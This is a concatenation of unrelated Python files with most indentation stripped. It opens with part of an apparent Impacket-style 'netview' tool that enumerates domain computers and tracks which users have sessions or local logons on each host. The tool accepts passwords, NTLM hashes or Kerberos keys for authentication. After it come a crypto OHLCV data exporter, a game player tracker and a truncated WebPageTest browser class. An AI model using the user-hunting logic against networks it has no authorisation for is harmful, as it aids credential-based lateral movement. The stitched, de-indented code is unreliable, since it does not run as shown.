resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
            # Since it's gonna be a one-shot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in list(self.__targets.keys()):
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException) as e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception as e:
#import traceback
#traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
        # Let's see who created a connection since the last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))
printCRLF = True
else:
print("%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))
printCRLF = True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s logged off from host %s" % (target, userName, sourceIP))
printCRLF=True
else:
print("%s: user %s logged off from host %s" % (target, userName, sourceIP))
printCRLF=True
if printCRLF is True:
print()
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
            elif str(e).upper().find('ACCESS_DENIED') >= 0:
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
        # Let's see who logged in locally since the last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName))
printCRLF=True
else:
print("%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName))
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName))
printCRLF=True
else:
print("%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName))
printCRLF=True
if printCRLF is True:
print()
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser()
parser.add_argument('identity', action='store', help='[domain/]username[:password]')
parser.add_argument('-user', action='store', help='Filter output by this user')
    parser.add_argument('-users', type=argparse.FileType('r'), help='input file with a list of users to filter the output by')
#parser.add_argument('-group', action='store', help='Filter output by members of this group')
#parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')
    parser.add_argument('-target', action='store', help='target system to query info from. If not specified, the script will '
'run in domain mode.')
    parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with target systems to query info '
                        'from (one per line). If not specified, the script will run in domain mode.')
parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')
parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe '
'(default 10 seconds)')
parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep '
'opened (default 1000)')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
                       'omitted, it will use the domain part (FQDN) specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
domain, username, password = parse_credentials(options.identity)
try:
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
executer.stop()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
executer.stop()
sys.exit(0)
out_ohlcv.py
import datetime
import os
import shutil
import threading
import time
from datetime import date, timedelta
import XsCore
import json
import pandas as pd
from PySide6 import QtWidgets
from PySide6.QtCore import QTimer
from PySide6.QtGui import Qt
from PySide6.QtWidgets import QSizePolicy, QHeaderView
from XsCore import XsDateUtils
from ccxt import Exchange, NetworkError
from pandas_model import PandasModel
from plugin_base import PluginBase
from plugin_ui_base import PluginUiBase
class Out_Ohlcv_XsPlugin(PluginBase):
name: str = "Out_Ohlcv"
    display_name: str = "Export historical OHLCV (K-line) data"
    info = "Calls: exchange.fetch_ohlcv(symbol, timeframe='1m', since=start_time_stamp, limit=limit_count)"
    def get_ui(self) -> QtWidgets.QWidget:
        return OrderBooksUi(self.exchange)
class OrderBooksUi(PluginUiBase):
    kline_type = {
        'Minute': '1m',
        'Hour': '1h',
        'Day': '1d',
    }
def data_bind(self):
        self.on_log('Loading data...', is_json=False)
try:
markets = self.exchange.load_markets()
self.on_log(markets)
except NetworkError as err:
            self.on_log(f'The API did not respond: {err}', is_json=False)
return
lstSort = []
for key in markets:
lstSort.append(key)
lstSort.sort()
self.listWidget.addItems(lstSort)
# for key in markets:
# self.listWidget.addItem(key)
def __init__(self, ex):
super().__init__(ex)
self.vbox = QtWidgets.QHBoxLayout()
self.setLayout(self.vbox)
self.listWidget = QtWidgets.QListWidget()
# self.json_box = QtWidgets.QTextBrowser()
self.v_right = QtWidgets.QVBoxLayout()
self.vbox.addWidget(self.listWidget)
self.vbox.addLayout(self.v_right)
        self.v_right.addWidget(QtWidgets.QLabel('Select K-line interval'))
self.cb_k_type = QtWidgets.QComboBox()
self.cb_k_type.addItems(self.kline_type.keys())
self.v_right.addWidget(self.cb_k_type)
        self.v_right.addWidget(QtWidgets.QLabel('Select start date'))
self.dt_start = QtWidgets.QDateEdit()
to_date = date.today()
to_date += timedelta(days=-7)
self.dt_start.setDate(to_date)
self.v_right.addWidget(self.dt_start)
        self.v_right.addWidget(QtWidgets.QLabel('Select end date'))
self.dt_end = QtWidgets.QDateEdit()
self.dt_end.setDate(date.today())
self.v_right.addWidget(self.dt_end)
        self.btn_sel_path = QtWidgets.QPushButton("Select output directory")
self.btn_sel_path.clicked.connect(self.sel_path)
self.v_right.addWidget(self.btn_sel_path)
        self.btn_save = QtWidgets.QPushButton("Export")
self.btn_save.clicked.connect(self.start_run)
self.v_right.addWidget(self.btn_save)
self.listWidget.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Expanding)
self.listWidget.itemClicked.connect(self.clicked)
self.symbol = ''
        self.out_path = ''  # final merged export directory chosen by the user
        self.save_dir = ""  # directory that holds the temporary per-request data files
self.startTime = ""
self.endTime = ""
self.timeType = ""
def sel_path(self):
directory = QtWidgets.QFileDialog.getExistingDirectory(self, "getExistingDirectory", "./")
self.out_path = directory
self.btn_sel_path.setText(directory)
def start_run(self):
if self.symbol == '':
            XsCore.showInfo('Please select a trading pair first')
return
if self.out_path == '':
            XsCore.showInfo('Please select an export directory')
return
self.timeType = self.cb_k_type.currentText()
self.startTime = self.dt_start.date().toString(Qt.ISODate)
self.endTime = self.dt_end.date().toString(Qt.ISODate)
self.btn_save.setEnabled(False)
        thread_bind = threading.Thread(
            target=self.get_kline,
            args=(self.symbol, self.startTime, self.endTime, self.kline_type[self.timeType]))
        thread_bind.start()
# self.get_kline(self.symbol, s, e,self.kline_type[kl_type_key])
    def get_kline(self, symbol, start_time, end_time, date_type='1m'):
        """
        Fetch OHLCV data from the exchange and save it in batches.
        :param date_type: timeframe string, e.g. '1m'
        :param symbol: requested symbol, e.g. BTC/USDT or ETH/USD
        :param start_time: like 2018-1-1
        :param end_time: like 2019-1-1
        :return:
        """
current_path = os.getcwd()
file_dir = os.path.join(current_path,'database\\out', symbol.replace('/', ''))
if os.path.exists(file_dir):
            # If the directory already exists, remove it first to clear out old data.
            shutil.rmtree(file_dir)  # shutil.rmtree removes non-empty directories; os.removedirs only handles empty ones
            print("Removed existing directory")
        os.makedirs(file_dir)  # create the folder that holds the temporary batch files
self.save_dir = file_dir
start_time = datetime.datetime.strptime(start_time, '%Y-%m-%d')
end_time = datetime.datetime.strptime(end_time, '%Y-%m-%d')
start_time_stamp = int(time.mktime(start_time.timetuple())) * 1000
end_time_stamp = int(time.mktime(end_time.timetuple())) * 1000
        limit_count = 200  # bybit limits each request to 200 candles
        self.on_log('Starting data download...', is_json=False)
while True:
try:
                print(f'Requesting {limit_count} candles starting from timestamp {start_time_stamp}')
data = self.exchange.fetch_ohlcv(symbol, timeframe=date_type, since=start_time_stamp, limit=limit_count)
df = pd.DataFrame(data)
df.rename(columns={0: 'datetime', 1: 'open', 2: 'high', 3: 'low', 4: 'close', 5: 'volume'},
inplace=True)
                start_time_stamp = int(df.iloc[-1]['datetime'])  # timestamp to use as `since` for the next request
filename = str(start_time_stamp) + '.csv'
save_file_path = os.path.join(file_dir, filename)
df.set_index('datetime', drop=True, inplace=True)
df.to_csv(save_file_path)
                # self.on_log(f'Saved: {save_file_path}', is_json=False)
if start_time_stamp > end_time_stamp:
print("完成数据的请求.")
# self.on_log('完成数据的请求', is_json=False)
break
time.sleep(0.2) # 1/25
except Exception as error:
print("发生错误了:")
print(error)
time.sleep(10)
print("清洗数据.")
self.clear_datas()
print("结束.")
self.on_log('所有操作完成!', is_json=False)
self.btn_save.setEnabled(True)
def closeEvent(self, event):
        print('Plugin is closing...')
# self.timer.stop()
event.accept()
self.destroy()
# event.ignore()
def clicked(self, item):
self.symbol = item.text()
def sample_datas(self):
"""
:param exchange_name:
:param symbol:
:return:
"""
path = self.save_dir
file_paths = []
for root, dirs, files in os.walk(path):
if files:
for file in files:
if file.endswith('.csv'):
file_paths.append(os.path.join(path, file))
file_paths = sorted(file_paths)
all_df = pd.DataFrame()
for file in file_paths:
df = pd.read_csv(file)
# all_df = all_df.append(df, ignore_index=True)
all_df = pd.concat([all_df,df], ignore_index=True)
all_df = all_df.sort_values(by='datetime', ascending=True)
# print(all_df)
return all_df
# for index, item in all_df.iterrows():
# try:
# dt = (pd.to_datetime(item['open_time'], unit='ms'))
# print(dt)
# dt = datetime.datetime.strptime(str(dt), '%Y-%m-%d %H:%M:%S') # 2018-01-01 17:36:00:42
# print(dt)
# except:
# dt = (pd.to_datetime(item['open_time'], unit='ms'))
# print(dt)
def clear_datas(self):
df = self.sample_datas()
# print(df)
# exit()
# df['open_time'] = df['open_time'].apply(lambda x: time.mktime(x.timetuple()))
        # # date.timetuple() converts the date into a time tuple
# # print(df)
# df['open_time'] = df['open_time'].apply(lambda x: (x // 60) * 60 * 1000)
        df['datetime'] = df['datetime'].apply(lambda x: (x // 60000) * 60000)  # snap millisecond timestamps to whole minutes
print(df)
        df['Datetime2'] = pd.to_datetime(df['datetime'], unit='ms') + pd.Timedelta(hours=8)  # convert UTC to Beijing time (UTC+8)
        df['Datetime2'] = df['Datetime2'].apply(lambda x: str(x)[0:19])  # keep only 'YYYY-MM-DD HH:MM:SS' by truncating the string
# df['Datetime3'] = XsDateUtils.seconds_to_str(df['datetime'].astype(int)/1000)
df.drop_duplicates(subset=['datetime'], inplace=True)
df.set_index('Datetime2', inplace=True)
# print("*" * 20)
# print(df)
        savetodir = f'{self.out_path}/{self.symbol.replace("/","")}_{self.startTime}_to_{self.endTime}_{self.timeType}.csv'
print(savetodir)
df.to_csv(savetodir)
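# A minimal sketch of the same pagination idea without the GUI, assuming a ccxt
# bybit instance and millisecond timestamps; the symbol and date range are placeholders.
# fetch_ohlcv returns [timestamp, open, high, low, close, volume] rows, and `since`
# is advanced past the last returned candle until the requested range is covered.
if __name__ == '__main__':
    import ccxt
    exchange = ccxt.bybit()
    since = exchange.parse8601('2023-01-01T00:00:00Z')
    end = exchange.parse8601('2023-01-02T00:00:00Z')
    rows = []
    while since < end:
        batch = exchange.fetch_ohlcv('BTC/USDT', timeframe='1m', since=since, limit=200)
        if not batch:
            break
        rows.extend(batch)
        since = batch[-1][0] + 1  # continue just after the last candle received
        time.sleep(exchange.rateLimit / 1000)  # respect the exchange rate limit
    print(f'Fetched {len(rows)} candles')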
hideout.py
''' track players in hideout '''
import threading
import logging
from player import players
from misc import my_queue, player_joined_q, PLAYER_JOINED_STATUS
import config
logger = logging.getLogger('bot_log')
class Hideout():
''' monitor player activity in hideout '''
def __init__(self):
self.updater_thread = None
self._new_activity_q = my_queue("players joined")
def start(self):
        ''' Start a thread that periodically consumes player joined/left area events '''
self.updater_thread = threading.Thread(
target=self.track_hideout_activity, args=(player_joined_q,))
self.updater_thread.daemon = True
self.updater_thread.start()
def track_hideout_activity(self, queue):
''' listen to the queue and update the players present in hideout '''
while True:
msg = queue.get()
if msg.new_status == PLAYER_JOINED_STATUS.JOINED:
player = players.get_player(msg.player_name)
if player is None:
logger.warning(
"Player {} joined area but it is not in player list".format(msg.player_name))
else:
player.joined_hideout()
logger.info(
"Player {} has joined the area".format(player))
logger.debug(
"Players in area {}".format(players.get_all()))
# Add this player to the "recently joined" queue
self._new_activity_q.put(player)
elif msg.new_status == PLAYER_JOINED_STATUS.LEFT:
player = players.get_player(msg.player_name)
if player is None:
logger.warning(
"Player {} left area but it is not in player list".format(msg.player_name))
else:
player.left_hideout()
# Stop tracking players when they leave the hideout
players.remove_player(player)
logger.info(
"Player {} has left the area".format(player))
logger.debug(
"Players in area {}".format(players.get_all()))
else:
pass
    def recently_joined_players(self):
        ''' returns an array of TRACKED players that have joined the area since last call '''
        joined = []  # local name avoids shadowing the imported `players` registry
        # Fetch all recent events
        while True:
            temp = self._new_activity_q.get(block=False)
            if temp is not None:
                joined.append(temp)
            else:
                break
        return joined
hideout = Hideout()
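# A minimal consumer sketch (hypothetical, never called here): a bot loop could
# periodically drain the "recently joined" list and act on each tracked player.
def announce_new_players(poll_interval=5):
    import time as _time
    while True:
        for joined_player in hideout.recently_joined_players():
            logger.info("Would greet %s now", joined_player)
        _time.sleep(poll_interval)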
if __name__ == '__main__':
logger.setLevel(level=logging.DEBUG)
console_log = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(levelname)s %(lineno)d:%(filename)s(%(process)d) - %(message)s')
console_log.setFormatter(formatter)
logger.addHandler(console_log)
from log_parser import LogParser
import time
parser = LogParser(config.LOG_PATH)
parser.start()
hideout.start()
while True:
time.sleep(1)
devtools_browser.py
# Copyright 2019 WebPageTest LLC.
# Copyright 2017 Google Inc.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Base class support for browsers that speak the dev tools protocol"""
import glob
import gzip
import io
import logging
import os
import re
import shutil
import subprocess
import sys
import threading
import time
if (sys.version_info > (3, 0)):
from time import monotonic
unicode = str
GZIP_TEXT = 'wt'
else:
from monotonic import monotonic
GZIP_TEXT = 'w'
try:
import ujson as json
except BaseException:
import json
from .optimization_checks import OptimizationChecks
class DevtoolsBrowser(object):
"""Devtools Browser base"""
CONNECT_TIME_LIMIT = 120
def __init__(self, options, job, use_devtools_video=True):
self.options = options
self.job = job
self.devtools = None
self.task = None
self.event_name = None
self.browser_version = None
self.device_pixel_ratio = None
self.use_devtools_video = use_devtools_video
self.lighthouse_command = None
self.devtools_screenshot = True
self.support_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'support')
self.script_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'js')
def connect(self, task):
"""Connect to the dev tools interface"""
ret = False
from internal.devtools import DevTools
self.devtools = DevTools(self.options, self.job, task, self.use_devtools_video)
if task['running_lighthouse']:
ret = self.devtools.wait_for_available(self.CONNECT_TIME_LIMIT)
else:
if self.devtools.connect(self.CONNECT_TIME_LIMIT):
logging.debug("Devtools connected")
ret = True
else:
task['error'] = "Error connecting to dev tools interface"
logging.critical(task['error'])
self.devtools = None
return ret
def disconnect(self):
"""Disconnect from dev tools"""
if self.devtools is not None:
# Always navigate to about:blank after finishing in case the tab is
# remembered across sessions
if self.task is not None and self.task['error'] is None:
self.devtools.send_command('Page.navigate', {'url': 'about:blank'}, wait=True)
self.devtools.close()
self.devtools = None
def prepare_browser(self, task):
"""Prepare the running browser (mobile emulation, UA string, etc"""
if self.devtools is not None:
# Figure out the native viewport size
if not self.options.android:
size = self.devtools.execute_js("[window.innerWidth, window.innerHeight]")
if size is not None and len(size) == 2:
task['actual_viewport'] = {"width": size[0], "height": size[1]}
# Get the native device pixel ratio
if self.device_pixel_ratio is None:
self.device_pixel_ratio = 1.0
try:
ratio = self.devtools.execute_js('window.devicePixelRatio')
if ratio is not None:
self.device_pixel_ratio = max(1.0, float(ratio))
except Exception:
pass
# Clear the caches
if not task['cached']:
self.devtools.send_command("Network.clearBrowserCache", {},
wait=True)
self.devtools.send_command("Network.clearBrowserCookies", {},
wait=True)
# Mobile Emulation
if not self.options.android and \
'mobile' in self.job and self.job['mobile'] and \
'width' in self.job and 'height' in self.job and \
'dpr' in self.job:
width = int(re.search(r'\d+', str(self.job['width'])).group())
height = int(re.search(r'\d+', str(self.job['height'])).group())
self.devtools.send_command("Emulation.setDeviceMetricsOverride",
{"width": width,
"height": height,
"screenWidth": width,
"screenHeight": height,
"scale": 1,
"positionX": 0,
"positionY": 0,
"deviceScaleFactor": float(self.job['dpr']),
"mobile": True,
"screenOrientation":
{"angle": 0, "type": "portraitPrimary"}},
wait=True)
self.devtools.send_command("Emulation.setTouchEmulationEnabled",
{"enabled": True,
"configuration": "mobile"},
wait=True)
self.devtools.send_command("Emulation.setScrollbarsHidden",
{"hidden": True},
wait=True)
if (task['running_lighthouse'] or not self.options.throttle) and 'throttle_cpu' in self.job:
logging.debug('CPU Throttle target: %0.3fx', self.job['throttle_cpu'])
if self.job['throttle_cpu'] > 1:
self.devtools.send_command("Emulation.setCPUThrottlingRate",
{"rate": self.job['throttle_cpu']},
wait=True)
# Location
if 'lat' in self.job and 'lng' in self.job:
try:
lat = float(str(self.job['lat']))
lng = float(str(self.job['lng']))
self.devtools.send_command(
'Emulation.setGeolocationOverride',
{'latitude': lat, 'longitude': lng,
'accuracy': 0})
except Exception:
logging.exception('Error overriding location')
# UA String
ua_string = self.devtools.execute_js("navigator.userAgent")
if ua_string is not None:
match = re.search(r'Chrome\/(\d+\.\d+\.\d+\.\d+)', ua_string)
if match:
self.browser_version = match.group(1)
if 'uastring' in self.job:
ua_string = self.job['uastring']
if ua_string is not None and 'AppendUA' in task:
ua_string += ' ' + task['AppendUA']
if ua_string is not None:
self.job['user_agent_string'] = ua_string
# Disable js
if self.job['noscript']:
self.devtools.send_command("Emulation.setScriptExecutionDisabled",
{"value": True}, wait=True)
self.devtools.prepare_browser()
def on_start_recording(self, task):
"""Start recording"""
task['page_data'] = {'date': time.time()}
task['page_result'] = None
task['run_start_time'] = monotonic()
if self.browser_version is not None and 'browserVersion' not in task['page_data']:
task['page_data']['browserVersion'] = self.browser_version
task['page_data']['browser_version'] = self.browser_version
if not self.options.throttle and 'throttle_cpu' in self.job:
task['page_data']['throttle_cpu_requested'] = self.job['throttle_cpu_requested']
if self.job['throttle_cpu'] > 1:
task['page_data']['throttle_cpu'] = self.job['throttle_cpu']
if self.devtools is not None:
self.devtools.start_recording()
def on_stop_capture(self, task):
"""Do any quick work to stop things that are capturing data"""
if self.devtools is not None:
self.devtools.stop_capture()
def on_stop_recording(self, task):
"""Stop recording"""
if self.devtools is not None:
self.devtools.collect_trace()
if self.devtools_screenshot:
if self.job['pngScreenShot']:
screen_shot = os.path.join(task['dir'],
task['prefix'] + '_screen.png')
self.devtools.grab_screenshot(screen_shot, png=True)
else:
screen_shot = os.path.join(task['dir'],
task['prefix'] + '_screen.jpg')
self.devtools.grab_screenshot(screen_shot, png=False, resize=600)
# Collect end of test data from the browser
self.collect_browser_metrics(task)
# Stop recording dev tools (which also collects the trace)
self.devtools.stop_recording()
def run_task(self, task):
"""Run an individual test"""
if self.devtools is not None:
self.task = task
logging.debug("Running test")
end_time = monotonic() + task['test_time_limit']
task['current_step'] = 1
recording = False
while len(task['script']) and task['error'] is None and \
monotonic() < end_time:
self.prepare_task(task)
command = task['script'].pop(0)
if not recording and command['record']:
recording = True
self.on_start_recording(task)
self.process_command(command)
if command['record']:
self.devtools.wait_for_page_load()
if not task['combine_steps'] or not len(task['script']):
self.on_stop_capture(task)
self.on_stop_recording(task)
recording = False
self.on_start_processing(task)
self.wait_for_processing(task)
self.process_devtools_requests(task)
self.step_complete(task) #pylint: disable=no-member
if task['log_data']:
# Move on to the next step
task['current_step'] += 1
self.event_name = None
task['navigated'] = True
self.task = None
def on_start_processing(self, task):
"""Start any processing of the captured data"""
if task['log_data']:
# Start the processing that can run in a background thread
optimization = OptimizationChecks(self.job, task, self.get_requests())
optimization.start()
# Run the video post-processing
if self.use_devtools_video and self.job['video']:
self.process_video()
self.wappalyzer_detect(task, self.devtools.main_request_headers)
# wait for the background optimization checks
optimization.join()
def wait_for_processing(self, task):
"""Wait for the background processing (if any)"""
pass
def execute_js(self, script):
"""Run javascipt"""
ret = None
if self.devtools is not None:
ret = self.devtools.execute_js(script)
return ret
def prepare_task(self, task):
"""Format the file prefixes for multi-step testing"""
if task['current_step'] == 1:
task['prefix'] = task['task_prefix']
task['video_subdirectory'] = task['task_video_prefix']
else:
task['prefix'] = '{0}_{1:d}'.format(task['task_prefix'], task['current_step'])
task['video_subdirectory'] = '{0}_{1:d}'.format(task['task_video_prefix'],
task['current_step'])
if task['video_subdirectory'] not in task['video_directories']:
task['video_directories'].append(task['video_subdirectory'])
if self.event_name is not None:
task['step_name'] = self.event_name
else:
task['step_name'] = 'Step_{0:d}'.format(task['current_step'])
def process_video(self):
"""Post process the video"""
from internal.video_processing import VideoProcessing
video = VideoProcessing(self.options, self.job, self.task)
video.process()
def process_devtools_requests(self, task):
"""Process the devtools log and pull out the requests information"""
path_base = os.path.join(self.task['dir'], self.task['prefix'])
devtools_file = path_base + '_devtools.json.gz'
if os.path.isfile(devtools_file):
from internal.support.devtools_parser import DevToolsParser
out_file = path_base + '_devtools_requests.json.gz'
options = {'devtools': devtools_file, 'cached': task['cached'], 'out': out_file}
netlog = path_base + '_netlog_requests.json.gz'
options['netlog'] = netlog if os.path.isfile(netlog) else None
optimization = path_base + '_optimization.json.gz'
options['optimization'] = optimization if os.path.isfile(optimization) else None
user_timing = path_base + '_user_timing.json.gz'
options['user'] = user_timing if os.path.isfile(user_timing) else None
coverage = path_base + '_coverage.json.gz'
options['coverage'] = coverage if os.path.isfile(coverage) else None
cpu = path_base + '_timeline_cpu.json.gz'
options['cpu'] = cpu if os.path.isfile(cpu) else None
v8stats = path_base + '_v8stats.json.gz'
options['v8stats'] = v8stats if os.path.isfile(v8stats) else None
parser = DevToolsParser(options)
parser.process()
# Cleanup intermediate files that are not needed
if 'debug' not in self.job or not self.job['debug']:
if os.path.isfile(netlog):
os.remove(netlog)
if os.path.isfile(optimization):
os.remove(optimization)
if os.path.isfile(coverage):
os.remove(coverage)
if os.path.isfile(devtools_file):
os.remove(devtools_file)
if 'page_data' in parser.result and 'result' in parser.result['page_data']:
self.task['page_result'] = parser.result['page_data']['result']
def run_js_file(self, file_name):
"""Execute one of our js scripts"""
ret = None
script = None
script_file_path = os.path.join(self.script_dir, file_name)
if os.path.isfile(script_file_path):
